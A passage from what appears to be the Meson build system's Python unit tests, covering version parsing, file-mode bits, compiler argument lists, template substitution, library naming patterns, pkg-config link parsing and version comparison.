def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class PatchModule:
'''
Fancy monkey-patching! Whee! Can't use mock.patch because it only
patches in the local namespace.
'''
def __init__(self, func, name, impl):
self.func = func
assert(isinstance(name, str))
self.func_name = name
self.old_impl = None
self.new_impl = impl
def __enter__(self):
self.old_impl = self.func
exec('{} = self.new_impl'.format(self.func_name))
def __exit__(self, *args):
exec('{} = self.old_impl'.format(self.func_name))
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that bad initialization fails
self.assertRaises(TypeError, cargsfunc, [])
self.assertRaises(TypeError, cargsfunc, [], [])
self.assertRaises(TypeError, cargsfunc, cc, [], [])
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(['-I.', '-I..'], cc)
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(['-I.', '-I.'], cc), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix())
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix())
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix())
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
